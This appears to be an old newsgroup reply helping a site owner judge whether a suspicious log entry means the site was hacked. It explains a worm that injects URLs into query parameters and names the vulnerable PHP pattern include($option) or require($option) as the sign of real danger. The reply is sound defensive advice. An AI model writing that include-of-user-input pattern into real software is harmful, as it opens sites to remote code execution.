bingster <bdu@iastate.edu> writes:
> Thanks very much for the heads-up. I did not quite get what you
> said. Is there any tutorial like information on what the effect is of
> embedding URL within other URL?

This depends entirely on the script. By default, absolutely no effect
*but* some scripts may be set up to do one or more of:
a) Download the URL
b) Display a link to the URL
c) Send a HTTP redirect to the URL
d) Run arbitrary commands, as directed by the content of the URL
e) Format your hard disk
f) Play the 1812 overture from the server's internal speaker
g) Something else entirely

This particular thing looks a bit like a worm that's been going around
that replaces random parameters in URLs with a URL, in the hope that
'd' will occur. With the number of badly written scripts on the web,
it's bound to work eventually.

> Juha Laiho wrote:
> > bingster <bdu@iastate.edu> said:
> >> How can I tell if my site has been hacked from looking the
> >> access_log or other log files? I found the following log entry
> >> suspicious because of its 'option' part but cannot tell more than
> >> that, like what it really did to my site, etc.

It's suspicious but maybe not dangerous.

Look at the PHP script in question. If it does:
include($option); or
require($option); or
something else similar, then you are in trouble.

If you have PHP safe mode turned *on* you may be in much less trouble,
as this blocks most arbitrary command execution.

If the script doesn't have something like that - it just does something like
if ($option == 'one') {
function_one(1,2,3);
} else {
function_two(4,5,6);
}
then it's safe.

If you don't understand PHP, you will need to learn PHP before
determining if the script is safe to put a URL in the 'option'
value. There are several PHP tutorials on the web, some good, some
which will inadvertantly encourage you into writing scripts that do
'd'...

--
Chris